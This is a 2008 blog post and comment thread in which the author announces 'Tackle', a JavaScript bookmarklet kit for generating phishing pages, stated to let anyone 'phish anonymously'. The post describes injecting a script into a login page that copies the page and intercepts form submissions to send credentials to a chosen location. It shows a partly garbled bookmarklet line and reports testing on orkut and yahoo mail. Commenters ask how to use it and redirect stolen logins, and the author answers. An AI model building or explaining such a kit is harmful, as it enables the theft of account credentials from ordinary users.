Sunday, June 15, 2008

Tackle : A javascript based phishing kit

"You give him a fish and that will serve him for a day, you teach him how to fish, and that shall serve him for a lifetime"

Well, so here is a quick and dirty phishing page generator I wrote totally in JavaScript. The main aim of this kit was to enable anyone to phish anonymously - just host one static HTML page on a well known free space provider, and get the credentials at an anonymous location. For people to effectively generate phished pages, the software should be a zero-install, easy to use solution.
I started hacking something together this weekend, and this is what I have got till now.
All that a user will have to do is visit a login page and then, copy paste the following on the address bar.

javascript:(function(){var x = document.createElement("script"); = "phishJS";x.src = "";document.body.appendChild(x);})()
This inserts the Tackle JavaScript code into the page that does the needful to generate a phished version of the page. Typically. the script converts all paths (CSS, JS and images) to absolute URLs. It then inserts a small script in the page that intercepts submission of any form and passes the credentials to the desired location.
Though the script is still in early alpha, you could check it out. Please do let me know of potential bugs, or usability issues. I have tried it on orkut, yahoo mail, etc. I would write a post detailing the use of the interface, a post that would also linked to as help from the page. Watch out this space for updates.
Lastly, why is it called Tackle ? Well, wikipedia tells me that a tackle is an instrument used for fishing. Well, this does help you in phishing !! :)


friendsterloginservice said...


can you tell me where to insert the jscript?

tnx for making the world balance..

Parashuram said...

type the script in the address bar of your browser.

Anonymous said...

Great stuff, dude! I am trying this out. Will let you know the results.......

Do you have any updates?

Anonymous said...

thank you for sharing

Kodystokes said...

Alright, so I get that you put this into the browser of the login page, and it redirects users/passes to a location, but how do you edit the location the users/passes go to? Or is previous javascript knowledge needed to really use this Tackle?

Post a Comment